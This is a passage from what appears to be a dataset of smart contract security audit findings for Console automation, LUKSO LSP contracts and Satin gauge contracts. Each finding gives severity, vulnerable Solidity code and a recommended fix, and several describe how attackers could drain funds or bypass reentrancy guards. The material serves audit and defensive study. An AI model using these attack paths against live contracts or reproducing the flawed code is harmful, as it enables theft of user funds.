tx.gasprice;\\n totalFee = _applyMultiplier(totalFee);\\n return (totalFee, recipient, TokenTransfer._nativeTransferExec(recipient, totalFee));\\n } else {uint256 totalFee = (gasUsed + GAS_OVERHEAD_ERC20) * tx.gasprice;\\n // Convert fee amount value in fee tokenuint256 feeToCollect =PriceFeedManager(_addressProvider.priceFeedManager()).getTokenXPriceInY(totalFee, ETH, feeToken);\\n feeToCollect = _applyMultiplier(feeToCollect);\\n return (feeToCollect, recipient, TokenTransfer._erc20TransferExec(feeToken, recipient, feeToCollect));}\\n```\\n",Use a gas oracle or a capped priority fee to ensure an inflated gas price down not harm the user.,,"```\\n if (feeToken == ETH) \\n {uint256 totalFee = (gasUsed + GAS_OVERHEAD_NATIVE) * tx.gasprice;\\n totalFee = _applyMultiplier(totalFee);\\n return (totalFee, recipient, TokenTransfer._nativeTransferExec(recipient, totalFee));\\n } else {uint256 totalFee = (gasUsed + GAS_OVERHEAD_ERC20) * tx.gasprice;\\n // Convert fee amount value in fee tokenuint256 feeToCollect =PriceFeedManager(_addressProvider.priceFeedManager()).getTokenXPriceInY(totalFee, ETH, feeToken);\\n feeToCollect = _applyMultiplier(feeToCollect);\\n return (feeToCollect, recipient, TokenTransfer._erc20TransferExec(feeToken, recipient, feeToCollect));}\\n```\\n" +Users can drain Gelato deposit at little cost,high,"In Console automation, fees are collected via the `claimExecutionFees()` modifier:\\n```\\n modifier claimExecutionFees(address _wallet) {\\n uint256 startGas = gasleft();\\n _;\\n if (feeMultiplier > 0) {\\n address feeToken = FeePayer._feeToken(_wallet);\\n uint256 gasUsed = startGas -gasleft();\\n (uint256 feeAmount, address recipient, Types.Executable memory feeTransferTxn)=FeePayer._buildFeeExecutable\\n (gasUsed, feeToken);\\n emit FeeClaimed(_wallet, feeToken, feeAmount);\\n if (feeToken != ETH) {uint256 initialBalance = IERC20(feeToken).balanceOf(recipient);_\\n executeSafeERC20Transfer(_wallet, feeTransferTxn);\\n if (IERC20(feeToken).balanceOf(recipient) -initialBalance < feeAmount){\\n revert UnsuccessfulFeeTransfer(_wallet, feeToken);}\\n } else {\\n uint256 initialBalance = recipient.balance;\\n Executor._executeOnWallet(_wallet, feeTransferTxn);\\n if (recipient.balance -initialBalance < feeAmount) {\\n revert UnsuccessfulFeeTransfer(_wallet, feeToken);\\n }\\n }\\n }\\n }\\n```\\n","When calculating fees in buildFeeExecutable(), there are assumptions about the gas cost of an ERC20 transfer and a native transfer.\\n```\\n // Keeper network overhead -150k\\n uint256 internal constant GAS_OVERHEAD_NATIVE = 150_000 + 40_000;\\n uint256 internal constant GAS_OVERHEAD_ERC20 = 150_000 + 90_000;\\n```\\n\\nA good fix would be to check the actual gas usage and require it to be under the hard cap.Team responseAdded a gas check for this attack.Mitigation reviewApplied fix has been applied.",,"```\\n modifier claimExecutionFees(address _wallet) {\\n uint256 startGas = gasleft();\\n _;\\n if (feeMultiplier > 0) {\\n address feeToken = FeePayer._feeToken(_wallet);\\n uint256 gasUsed = startGas -gasleft();\\n (uint256 feeAmount, address recipient, Types.Executable memory feeTransferTxn)=FeePayer._buildFeeExecutable\\n (gasUsed, feeToken);\\n emit FeeClaimed(_wallet, feeToken, feeAmount);\\n if (feeToken != ETH) {uint256 initialBalance = IERC20(feeToken).balanceOf(recipient);_\\n executeSafeERC20Transfer(_wallet, feeTransferTxn);\\n if (IERC20(feeToken).balanceOf(recipient) -initialBalance < feeAmount){\\n revert UnsuccessfulFeeTransfer(_wallet, feeToken);}\\n } else {\\n uint256 initialBalance = recipient.balance;\\n Executor._executeOnWallet(_wallet, feeTransferTxn);\\n if (recipient.balance -initialBalance < feeAmount) {\\n revert UnsuccessfulFeeTransfer(_wallet, feeToken);\\n }\\n }\\n }\\n }\\n```\\n" +Attackers can drain users over time by donating negligible ERC20 amount,high,"In the Console automation model, a strategy shall keep executing until its trigger check fails. For DCA strategies, the swapping trigger is defined as:\\n```\\n function canInitSwap(address subAccount, address inputToken, uint256 interval, uint256 lastSwap)\\n external view returns (bool)\\n {\\n if (hasZeroBalance(subAccount, inputToken)) \\n { return false;\\n }\\n return ((lastSwap + interval) < block.timestamp);\\n }\\n```\\n","Define a DUST_AMOUNT, below that amount exit is allowed, while above that amount swap execution is allowed. User should only stand to gain from another party donating ERC20 tokens to their account.",,"```\\n function canInitSwap(address subAccount, address inputToken, uint256 interval, uint256 lastSwap)\\n external view returns (bool)\\n {\\n if (hasZeroBalance(subAccount, inputToken)) \\n { return false;\\n }\\n return ((lastSwap + interval) < block.timestamp);\\n }\\n```\\n" +"When FeePayer is subsidizing, users can steal gas",medium,"```\\nThe feeMultiplier enables the admin to subsidize or upcharge for the automation service.\\n/**\\n⦁ @notice feeMultiplier represents the total fee to be charged on the transaction\\n⦁ Is set to 100% by default\\n⦁ @dev In case feeMultiplier is less than BASE_BPS, fees charged will be less than 100%,\\n⦁ subsidizing the transaction\\n⦁ In case feeMultiplier is greater than BASE_BPS, fees charged will be greater than 100%,\\n⦁ charging the user for the transaction\\n*/ \\n uint16 public feeMultiplier = 10_000;\\n // The normal fee is calculated and then processed by the multiplier.\\n if (feeToken == ETH) {\\n uint256 totalFee = (gasUsed + GAS_OVERHEAD_NATIVE) * tx.gasprice; \\n totalFee = _applyMultiplier(totalFee);\\n return (totalFee, recipient, TokenTransfer._nativeTransferExec(recipient, totalFee));\\n } else {\\n```\\n","The root cause is that the gasUsed amount is subsidized as well as GAS_OVERHEAD_NATIVE, which is the gas reserved for the delivery from Gelato executors. By subsidizing only the Gelato gas portion, users will not gain from gas minting attacks, while the intention of improving user experience is maintained.",,"```\\nThe feeMultiplier enables the admin to subsidize or upcharge for the automation service.\\n/**\\n⦁ @notice feeMultiplier represents the total fee to be charged on the transaction\\n⦁ Is set to 100% by default\\n⦁ @dev In case feeMultiplier is less than BASE_BPS, fees charged will be less than 100%,\\n⦁ subsidizing the transaction\\n⦁ In case feeMultiplier is greater than BASE_BPS, fees charged will be greater than 100%,\\n⦁ charging the user for the transaction\\n*/ \\n uint16 public feeMultiplier = 10_000;\\n // The normal fee is calculated and then processed by the multiplier.\\n if (feeToken == ETH) {\\n uint256 totalFee = (gasUsed + GAS_OVERHEAD_NATIVE) * tx.gasprice; \\n totalFee = _applyMultiplier(totalFee);\\n return (totalFee, recipient, TokenTransfer._nativeTransferExec(recipient, totalFee));\\n } else {\\n```\\n" +Strategy actions could be executed out of order due to lack of reentrancy guard,medium,"The Execute module performs automation of the fetched Executable array on wallet subaccounts.\\n```\\n function _executeAutomation( address _wallet, address _subAccount, address _strategy,\\n Types.Executable[] memory _actionExecs ) internal {\\n uint256 actionLen = _actionExecs.length;\\n if (actionLen == 0) {\\n revert InvalidActions();\\n } else {\\n uint256 idx = 0;\\n do {\\n _executeOnSubAccount(_wallet, _subAccount, _strategy,\\n _actionExecs[idx]);\\n unchecked {\\n ++idx;\\n }\\n } while (idx < actionLen);\\n }\\n }\\n```\\n",Add a reentrancy guard for `executeAutomationViaBot()` and `executeTrustedAutomation()`.,,"```\\n function _executeAutomation( address _wallet, address _subAccount, address _strategy,\\n Types.Executable[] memory _actionExecs ) internal {\\n uint256 actionLen = _actionExecs.length;\\n if (actionLen == 0) {\\n revert InvalidActions();\\n } else {\\n uint256 idx = 0;\\n do {\\n _executeOnSubAccount(_wallet, _subAccount, _strategy,\\n _actionExecs[idx]);\\n unchecked {\\n ++idx;\\n }\\n } while (idx < actionLen);\\n }\\n }\\n```\\n" +Anyone can make creating strategies extremely expensive for the user,medium,"In Console architecture, users can deploy spare subaccounts (Gnosis Safes) so that when they will subscribe to a strategy most of the gas spending would have been spent at a low-gas phase.\\n```\\n function deploySpareSubAccount(address _wallet) external { address subAccount =\\n SafeDeployer(addressProvider.safeDeployer()).deploySubAccount(_wallet);\\n subAccountToWalletMap[subAccount] = _wallet; walletToSubAccountMap[_wallet].push(subAccount);\\n // No need to update subAccountStatus as it is already set to false\\n emit SubAccountAllocated(_wallet, subAccount);\\n }\\n```\\n\\nImpact The issue is that anyone can call the deploy function and specify another user's wallet. While on the surface that sounds like donating gas costs, in practice this functionality can make operating with strategies prohibitively expensive. When users will subscribe to strategies, the StrategyRegistry will request a subaccount using this function:\\n```\\n function requestSubAccount(address _wallet) external returns (address) {\\n if (msg.sender != subscriptionRegistry) \\n revert OnlySubscriptionRegistryCallable();\\n // Try to find a subAccount which already exists\\n address[] memory subAccountList = walletToSubAccountMap[_wallet];\\n```\\n\\nAt this point, the entire subaccount array will be copied from storage to memory. Therefore, attackers can fill the array with hundreds of elements at a low-gas time and make creation of strategies very difficult.","Limit the amount of spare subaccount to something reasonable, like 10 Team Response: Removing the spare subaccount deployment Mitigation review: Attack surface has been removed.",,"```\\n function deploySpareSubAccount(address _wallet) external { address subAccount =\\n SafeDeployer(addressProvider.safeDeployer()).deploySubAccount(_wallet);\\n subAccountToWalletMap[subAccount] = _wallet; walletToSubAccountMap[_wallet].push(subAccount);\\n // No need to update subAccountStatus as it is already set to false\\n emit SubAccountAllocated(_wallet, subAccount);\\n }\\n```\\n" +"DCA Strategies build orders that may not be executable, wasting fees",medium,"In `_buildInitiateSwapExecutable()`, DCA strategies determine the swap parameters for the CoW Swap. The code has recently been refactored so that there may be more than one active order simultaneously. The issue is that the function assumes the user's entire ERC20 balance to be available for the order being built.\\n```\\n // Check if enough balance present to swap, else swap entire balance\\n uint256 amountIn = (inputTokenBalance < params.amountToSwap) ? \\n inputTokenBalance : params.amountToSwap;\\n```\\n\\nImpact This is a problem because if the previous order will be executed before the current order, there may not be enough funds to pull from the user to execute the swap. As a result, transaction execution fees are wasted.","Ensure only one swap can be in-flight at a time, or deduct the in-flight swap amounts from the current balance.",,"```\\n // Check if enough balance present to swap, else swap entire balance\\n uint256 amountIn = (inputTokenBalance < params.amountToSwap) ? \\n inputTokenBalance : params.amountToSwap;\\n```\\n" +User will lose all Console functionality when upgrading their wallet and an upgrade target has not been set up,medium,"Console supports upgrading of the manager wallet using the `upgradeWalletType()` function.\\n```\\n function upgradeWalletType() external {\\n if (!isWallet(msg.sender)) \\n revert WalletDoesntExist(msg.sender); uint8 fromWalletType = _walletDataMap[msg.sender].walletType;\\n _setWalletType(msg.sender, _upgradablePaths[fromWalletType]);\\n emit WalletUpgraded(msg.sender, fromWalletType,\\n _upgradablePaths[fromWalletType]);\\n }\\n```\\n\\nNote that upgradablePaths are set by governance. There is a lack of check that the upgradable path is defined before performing the upgrade.\\n```\\n function _setWalletType(address _wallet, uint8 _walletType) private {\\n _walletDataMap[_wallet].walletType = _walletType;\\n }\\n```\\n\\nIf _upgradablePaths[fromWalletType] is zero (uninitialized), the user's wallet type shall become zero too. However, zero is an invalid value, as defined by the isWallet() view function:\\n```\\n function isWallet(address _wallet) public view returns (bool) \\n { WalletData memory walletData = _walletDataMap[_wallet];\\n if (walletData.walletType == 0 || walletData.feeToken == address(0)){\\n return false;\\n }\\n return true;\\n }\\n```\\n\\nImpact As a result, most of the functionality of Console is permanently broken when users upgrade their wallet when an upgrade path isn't set. They can salvage their funds if it is a Safe account, as they can still execute on it directly.","When settings a new wallet type, make sure the new type is not zero.",,"```\\n function upgradeWalletType() external {\\n if (!isWallet(msg.sender)) \\n revert WalletDoesntExist(msg.sender); uint8 fromWalletType = _walletDataMap[msg.sender].walletType;\\n _setWalletType(msg.sender, _upgradablePaths[fromWalletType]);\\n emit WalletUpgraded(msg.sender, fromWalletType,\\n _upgradablePaths[fromWalletType]);\\n }\\n```\\n" +Rounding error causes an additional iteration of DCA strategies,low,"Both CoW strategies receive an interval and total amountIn of tokens to swap. They calculate the amount per iteration as below:\\n```\\n Types.TokenRequest[] memory tokens = new Types.TokenRequest[](1); \\n tokens[0] = Types.TokenRequest({token: inputToken, amount: amountIn});\\n amountIn = amountIn / iterations;\\n StrategyParams memory params = StrategyParams({ tokenIn: inputToken,\\n tokenOut: outputToken, amountToSwap: amountIn, interval: interval, remitToOwner: remitToOwner\\n });\\n```\\n",Change the amount requested from the management wallet to amountIn / iterations * iterations.,,"```\\n Types.TokenRequest[] memory tokens = new Types.TokenRequest[](1); \\n tokens[0] = Types.TokenRequest({token: inputToken, amount: amountIn});\\n amountIn = amountIn / iterations;\\n StrategyParams memory params = StrategyParams({ tokenIn: inputToken,\\n tokenOut: outputToken, amountToSwap: amountIn, interval: interval, remitToOwner: remitToOwner\\n });\\n```\\n" +Fee mismatch between contracts can make strategies unusable,low,"In CoW Swap strategies, fee is set in the strategy contracts and then passed to `initiateSwap()`. It is built in _buildInitiateSwapExecutable():\\n```\\n // Generate executable to initiate swap on DCACoWAutomation return Types.Executable({\\n callType: Types.CallType.DELEGATECALL, target: dcaCoWAutomation,\\n value: 0,\\n data: abi.encodeCall( DCACoWAutomation.initiateSwap,\\n (params.tokenIn, params.tokenOut, swapRecipient, amountIn, minAmountOut, swapFee)\\n )\\n });\\n```\\n\\nThere is a mismatch between the constraints around fees between the strategy contracts and the `initiateSwap()` function:\\n```\\n function setSwapFee(uint256 _swapFee) external {\\n _onlyGov();\\n if (_swapFee > 10_000) { revert InvalidSlippage();\\n }\\n swapFee = _swapFee;\\n }\\n if (feeBps > 0) {\\n if (feeBps > 1_000) revert FeeTooHigh();\\n amountIn = amountToSwap * (MAX_BPS - feeBps) / MAX_BPS;\\n```\\n","Enforce the same constraints on the fee percentage in both contracts, or remove the check from one of them as part of a simplified security model.",,"```\\n // Generate executable to initiate swap on DCACoWAutomation return Types.Executable({\\n callType: Types.CallType.DELEGATECALL, target: dcaCoWAutomation,\\n value: 0,\\n data: abi.encodeCall( DCACoWAutomation.initiateSwap,\\n (params.tokenIn, params.tokenOut, swapRecipient, amountIn, minAmountOut, swapFee)\\n )\\n });\\n```\\n" +Reentrancy protection can likely be bypassed,high,"The KeyManager offers reentrancy protection for interactions with the associated account. Through the LSP20 callbacks or through the `execute()` calls, it will call `_nonReentrantBefore()` before execution, and `_nonReentrantAfter()` post-execution. The latter will always reset the flag signaling entry.\\n```\\n function _nonReentrantAfter() internal virtual {\\n // By storing the original value once again, a refund is triggered \\n (see // https://eips.ethereum.org/EIPS/eip-2200)\\n _reentrancyStatus = false;\\n }\\n```\\n\\nAn attacker can abuse it to reenter provided that there exists some third-party contract with REENTRANCY_PERMISSION that performs some interaction with the contract. The attacker would trigger the third-party code path, which will clear the reentrancy status, and enable attacker to reenter. This could potentially be chained several times. Breaking the reentrancy assumption would make code that assumes such flows to be impossible to now be vulnerable.","In `_nonReentrantAfter()`, the flag should be returned to the original value before reentry, rather than always setting it to false.",,"```\\n function _nonReentrantAfter() internal virtual {\\n // By storing the original value once again, a refund is triggered \\n (see // https://eips.ethereum.org/EIPS/eip-2200)\\n _reentrancyStatus = false;\\n }\\n```\\n" +LSP20 verification library deviates from spec and will accept fail values,medium,"The functions `lsp20VerifyCall()` and `lsp20VerifyCallResult()` are called to validate the owner accepts some account interaction. The specification states they must return a specific 4 byte magic value. However, the implementation will accept any byte array that starts with the required magic value.\\n```\\n function _verifyCall(address logicVerifier) internal virtual returns (bool verifyAfter) {\\n (bool success, bytes memory returnedData) = logicVerifier.call(\\n abi.encodeWithSelector(ILSP20.lsp20VerifyCall.selector, msg.sender, msg.value, msg.data)\\n );\\n if (!success) _revert(false, returnedData);\\n if (returnedData.length < 32) revert \\n LSP20InvalidMagicValue(false, returnedData);\\n bytes32 magicValue = abi.decode(returnedData, (bytes32));\\n if (bytes3(magicValue) != \\n bytes3(ILSP20.lsp20VerifyCall.selector))\\n revert LSP20InvalidMagicValue(false, returnedData);\\n return bytes1(magicValue[3]) == 0x01 ? true : false;\\n }\\n```\\n\\nTherefore, implementations of the above functions which intend to signal failure status may be accepted by the verification wrapper above.","Verify that the return data length is 32 bytes (the 4 bytes are extended by the compiler), and that all other bytes are zero.",,"```\\n function _verifyCall(address logicVerifier) internal virtual returns (bool verifyAfter) {\\n (bool success, bytes memory returnedData) = logicVerifier.call(\\n abi.encodeWithSelector(ILSP20.lsp20VerifyCall.selector, msg.sender, msg.value, msg.data)\\n );\\n if (!success) _revert(false, returnedData);\\n if (returnedData.length < 32) revert \\n LSP20InvalidMagicValue(false, returnedData);\\n bytes32 magicValue = abi.decode(returnedData, (bytes32));\\n if (bytes3(magicValue) != \\n bytes3(ILSP20.lsp20VerifyCall.selector))\\n revert LSP20InvalidMagicValue(false, returnedData);\\n return bytes1(magicValue[3]) == 0x01 ? true : false;\\n }\\n```\\n" +Deviation from spec will result in dislocation of receiver delegate,medium,"The LSP0 `universalReceiver()` function looks up the receiver delegate by crafting a mapping key type.\\n```\\n bytes32 lsp1typeIdDelegateKey = LSP2Utils.generateMappingKey(\\n _LSP1_UNIVERSAL_RECEIVER_DELEGATE_PREFIX, bytes20(typeId));\\n```\\n\\nMapping keys are constructed of a 10-byte prefix, 2 zero bytes and a 20-byte suffix. However, followers of the specification will use an incorrect suffix. The docs do not discuss the trimming of bytes32 into a bytes20 type. The mismatch may cause various harmful scenarios when interacting with the delegate not using the reference implementation.",Document the trimming action in the LSP0 specification.,,"```\\n bytes32 lsp1typeIdDelegateKey = LSP2Utils.generateMappingKey(\\n _LSP1_UNIVERSAL_RECEIVER_DELEGATE_PREFIX, bytes20(typeId));\\n```\\n" +KeyManager ERC165 does not support LSP20,medium,"LSP6KeyManager supports LSP20 call verification. However, in `supportInterface()` it does not return the LSP20 interfaceId.\\n```\\n function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {\\n return\\n interfaceId == _INTERFACEID_LSP6 || interfaceId == _INTERFACEID_ERC1271 ||\\n super.supportsInterface(interfaceId);\\n }\\n```\\n\\nAs a result, clients which correctly check for support of LSP20 methods will not operate with the KeyManager implementation.",Insert another supported interfaceId under `supportsInterface()`.,,```\\n function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {\\n return\\n interfaceId == _INTERFACEID_LSP6 || interfaceId == _INTERFACEID_ERC1271 ||\\n super.supportsInterface(interfaceId);\\n }\\n```\\n +LSP0 ownership functions deviate from specification and reject native tokens,low,"The LSP specifications define the following functions for LSP0:\\n```\\n function transferOwnership(address newPendingOwner) external payable;\\n function renounceOwnership() external payable;\\n```\\n\\nHowever, their implementations are not payable.\\n```\\n function transferOwnership(address newOwner) public virtual\\n override(LSP14Ownable2Step, OwnableUnset)\\n {\\n```\\n\\n```\\n function renounceOwnership() public virtual override(LSP14Ownable2Step, OwnableUnset) {\\n address _owner = owner();\\n```\\n\\nThis may break interoperation between conforming and non-confirming contracts.","Remove the payable keyword in the specification for the above functions, or make the implementations payable",,```\\n function transferOwnership(address newPendingOwner) external payable;\\n function renounceOwnership() external payable;\\n```\\n +Transfers of vaults from an invalid source are not treated correctly by receiver delegate,low,"In the universalReceiver() function, if the notifying contract does not support LSP9, yet the typeID corresponds to an LSP9 transfer, the function will return instead of reverting.\\n```\\n if (\\n mapPrefix == _LSP10_VAULTS_MAP_KEY_PREFIX && notifier.code.length > 0 &&\\n !notifier.supportsERC165InterfaceUnchecked(_INTERFACEID_LSP9)\\n ) {\\n return ""LSP1: not an LSP9Vault ownership transfer"";\\n }\\n```\\n",Revert when dealing with transfers that cannot be valid.,,"```\\n if (\\n mapPrefix == _LSP10_VAULTS_MAP_KEY_PREFIX && notifier.code.length > 0 &&\\n !notifier.supportsERC165InterfaceUnchecked(_INTERFACEID_LSP9)\\n ) {\\n return ""LSP1: not an LSP9Vault ownership transfer"";\\n }\\n```\\n" +Relayer can choose amount of gas for delivery of message,low,"LSP6 supports relaying of calls using a supplied signature. The encoded message is defined as:\\n```\\n bytes memory encodedMessage = abi.encodePacked( LSP6_VERSION,\\n block.chainid,\\n nonce,\\n msgValue,\\n payload\\n );\\n```\\n\\nThe message doesn't include a gas parameter, which means the relayer can specify any gas amount. If the provided gas is insufficient, the entire transaction will revert. However, if the called contract exhibits different behavior depending on the supplied gas, a relayer (attacker) has control over that behavior.",Signed message should include the gas amount passed. Care should be taken to verify there is enough gas in the current state for the gas amount not to be truncated due to the 63/64 rule.,,"```\\n bytes memory encodedMessage = abi.encodePacked( LSP6_VERSION,\\n block.chainid,\\n nonce,\\n msgValue,\\n payload\\n );\\n```\\n" +_calculateClaim() does not distribute boost emissions correctly,high,"The function `_calculateClaim()` is responsible for the calculations of the amount of emissions a specific veSatin is entitled to claim. The idea is to distribute emissions only to veSatin tokens locked for more than minLockDurationForReward and only for the extra time the veSatin is locked for on top of minLockDurationForReward. As an example, if minLockDurationForReward is set to 6 months a veSatin locked for 7 months would receive emissions for 1 month and a veSatin locked for 5 months would receive no emissions at all. To do so the following code is executed in a loop, where every loop calculates the amount of emissions the veSatin accumulated during a specific week, in chronological order:\\n```\\n if ((lockEndTime - oldUserPoint.ts) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n\\nThe code distributes the rewards if the elapsed time between lockEndTime (the locking end timestamp) and oldUserPoint.ts is bigger than minLockDurationForReward. However, oldUserPoint.ts is the timestamp of the last user action on a veSatin, for example depositing LP by calling `increaseAmount()`. As an example, a user that locks his veSatin and does nothing else will receive rewards for the whole locking duration. In contrast, a user that performs one action a week would only receive rewards for the locking duration minus minLockDurationForReward",The variable weekCursor should be used instead of oldUserPoint.ts in the if condition:\\n```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n```\\n,,```\\n if ((lockEndTime - oldUserPoint.ts) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n +Users will be unable to claim emissions from veSatin tokens if they withdraw it or merge it,high,"The function `_calculateClaim()` uses the variable lockEndTime when checking if a veSatin is entitled to emissions for a particular week (code with mitigation from TRST-H-1):\\n```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n\\nHowever lockEndTime is set to 0 whenever a user withdraws a veSatin by calling `withdraw()` or merges one by calling `merge()`. When this is the case the operation lockEndTime - weekCursor underflows, thus reverting. This results in users being unable to claim veSatin emissions if they withdraw or merge it first","In the `withdraw()` and `merge()` functions, call `claim()` in VeDist.sol to claim emissions before setting the lock end timestamp to 0. In `merge()` this is only necessary for the veSatin passed as _from",,```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n +It's never possible to vote for new pools until setMaxVotesForPool() is called,high,"The function `_vote()` allows voting on a pool only when the current amount of votes plus the new votes is lower or equal to the value returned by _calculateMaxVotePossible():\\n```\\n require(_poolWeights <= _calculateMaxVotePossible(_pool), ""Max votes exceeded"");\\n```\\n\\nHowever, `_calculateMaxVotePossible()` returns 0 for every pool in which the variable maxVotesForPool has not been initialized, thus making `_vote()` revert:\\n```\\n return ((totalVotingPower * maxVotesForPool[_pool]) / 100);\\n```\\n",In `createGauge()` and `createGauge4Pool()` set maxVotesForPool for the pool the gauge is being created for to 100.,,"```\\n require(_poolWeights <= _calculateMaxVotePossible(_pool), ""Max votes exceeded"");\\n```\\n" +The protocol might transfer extra SATIN emissions to veSatin holders potentially making SatinVoter.sol insolvent,high,"The function `_distribute()` in SatinVoter.sol is generally responsible for distributing weekly emissions to a gauge based on the percentage of total votes the associated pool received. In particular, it's called by `updatePeriod()` (as per fix TRST-H-4) on the gauge associated with the Satin / $CASH pool. The variable veShare is set to be equal to the returned value of `calculateSatinCashLPVeShare()`, which is calculated as the percentage of Satin / $CASH LP times claimable[gauge] and represents the amount of SATIN that will be transferred to VeDist.sol when checkpointing emissions in checkpointEmissions():\\n```\\n uint _claimable = claimable[_gauge];\\n if (SATIN_CASH_LP_GAUGE == _gauge) {\\n veShare = calculateSatinCashLPVeShare(_claimable);\\n _claimable -= veShare;\\n }\\n if (_claimable > IMultiRewardsPool(_gauge).left(token) && _claimable / DURATION > 0) {\\n claimable[_gauge] = 0;\\n if (is4poolGauge[_gauge]) {\\n IGauge(_gauge).notifyRewardAmount(token, _claimable, true);\\n } else {\\n IGauge(_gauge).notifyRewardAmount(token, _claimable, false);\\n }\\n emit DistributeReward(msg.sender, _gauge, _claimable);\\n }\\n```\\n\\nHowever, when the if condition (_claimable > IMultiRewardsPool(_gauge).left(token) && _claimable / DURATION > 0) is false the variable claimable[_gauge] will not be set to 0, meaning the next time veShare will be calculated it will include emissions that have already been distributed, potentially making SatinVoter.sol insolvent",Adjust claimable[gauge] after calculating veShare and calculate veShare only if the msg.sender is SatinMinter.sol to prevent potential attackers from manipulating the value by repeatedly calling _distribute():\\n```\\n if (SATIN_CASH_LP_GAUGE == _gauge && msg.sender == minter) {\\n veShare = calculateSatinCashLPVeShare(_claimable);\\n claimable[_gauge] -= veShare;\\n _claimable -= veShare;\\n }\\n```\\n,,"```\\n uint _claimable = claimable[_gauge];\\n if (SATIN_CASH_LP_GAUGE == _gauge) {\\n veShare = calculateSatinCashLPVeShare(_claimable);\\n _claimable -= veShare;\\n }\\n if (_claimable > IMultiRewardsPool(_gauge).left(token) && _claimable / DURATION > 0) {\\n claimable[_gauge] = 0;\\n if (is4poolGauge[_gauge]) {\\n IGauge(_gauge).notifyRewardAmount(token, _claimable, true);\\n } else {\\n IGauge(_gauge).notifyRewardAmount(token, _claimable, false);\\n }\\n emit DistributeReward(msg.sender, _gauge, _claimable);\\n }\\n```\\n" +It's possible to drain all the funds from ExternalBribe,high,"The function `earned()` is used to calculate the amount rewards owed to a tokenId, to do so it performs a series operations over a loop and then it always executes:\\n```\\n Checkpoint memory cp = checkpoints[tokenId][_endIndex];\\n uint _lastEpochStart = _bribeStart(cp.timestamp);\\n uint _lastEpochEnd = _lastEpochStart + DURATION;\\n if (block.timestamp > _lastEpochEnd) {\\n reward += (cp.balanceOf * \\n tokenRewardsPerEpoch[token][_lastEpochStart]) /\\n supplyCheckpoints[getPriorSupplyIndex(_lastEpochEnd)].supply;\\n```\\n\\nwhich adds to reward the amount of rewards earned by the tokenId during the last epoch in which it was used to vote, but only if that happened at least a week prior (block.timestamp > _lastEpochEnd). Because of this, it's possible to call `earned()` multiple times in a row with a tokenId that voted more than a week before to drain the contract funds.","The function `earned()` is taken from the Velodrome protocol and is known to have issues. Because it uses the convoluted logic of looping over votes to calculate the rewards per epoch instead of looping over epochs, we recommend using the Velodrome fixed implementation, which we reviewed:\\n```\\n function earned(address token, uint tokenId) public view returns (uint) {\\n if (numCheckpoints[tokenId] == 0) {\\n return 0;\\n }\\n uint reward = 0;\\n uint _ts = 0;\\n uint _bal = 0;\\n uint _supply = 1;\\n uint _index = 0;\\n uint _currTs = _bribeStart(lastEarn[token][tokenId]); // take epoch last claimed in as starting point\\n _index = getPriorBalanceIndex(tokenId, _currTs);\\n _ts = checkpoints[tokenId][_index].timestamp;\\n _bal = checkpoints[tokenId][_index].balanceOf;\\n // accounts for case where lastEarn is before first checkpoint\\n _currTs = Math.max(_currTs, _bribeStart(_ts));\\n // get epochs between current epoch and first checkpoint in same epoch as last claim\\n uint numEpochs = (_bribeStart(block.timestamp) - _currTs) / DURATION;\\n if (numEpochs > 0) {\\n for (uint256 i = 0; i < numEpochs; i++) {\\n // get index of last checkpoint in this epoch\\n _index = getPriorBalanceIndex(tokenId, _currTs + DURATION);\\n // get checkpoint in this epoch\\n _ts = checkpoints[tokenId][_index].timestamp;\\n _bal = checkpoints[tokenId][_index].balanceOf;\\n // get supply of last checkpoint in this epoch\\n _supply = supplyCheckpoints[getPriorSupplyIndex(_currTs + DURATION)].supply;\\n reward += _bal * tokenRewardsPerEpoch[token][_currTs] / _supply;\\n _currTs += DURATION;\\n }\\n }\\n return reward;\\n }\\n```\\n",,```\\n Checkpoint memory cp = checkpoints[tokenId][_endIndex];\\n uint _lastEpochStart = _bribeStart(cp.timestamp);\\n uint _lastEpochEnd = _lastEpochStart + DURATION;\\n if (block.timestamp > _lastEpochEnd) {\\n reward += (cp.balanceOf * \\n tokenRewardsPerEpoch[token][_lastEpochStart]) /\\n supplyCheckpoints[getPriorSupplyIndex(_lastEpochEnd)].supply;\\n```\\n +Division by 0 can freeze emissions claims for veSatin holders,medium,"The function `_calculateClaim()` is responsible for the calculations of the amount of emissions a specific veSatin is entitled to claim. In doing so, this code is executed (code with mitigation from TRST-H-1):\\n```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n\\nThe variable veSupply[weekCursor] is used as a denominator without checking if it's 0, which could make the function revert. If the protocol ever reaches a state where veSupply[weekCursor] is 0, all the claims for veSatin that were locked during that week would fail for both past and future claims. The same issue is present in the function `_calculateEmissionsClaim()`",Ensure veSupply[weekCursor] is not 0 when performing the division.,,```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n +BaseV1Pair could break because of overflow,medium,"In the function _update(), called internally by `mint()`, `burn()` and `swap()`, the following code is executed:\\n```\\n uint256 timeElapsed = blockTimestamp - blockTimestampLast;\\n // overflow is desired\\n if (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {\\n reserve0CumulativeLast += _reserve0 * timeElapsed;\\n reserve1CumulativeLast += _reserve1 * timeElapsed;\\n }\\n```\\n\\nThis is forked from UniswapV2 source code, and it's meant and known to overflow. It works fine if solidity < 0.8.0 is used but reverts when solidity >= 0.8.0 is used. If this happens all the core functionalities of the pool would break, 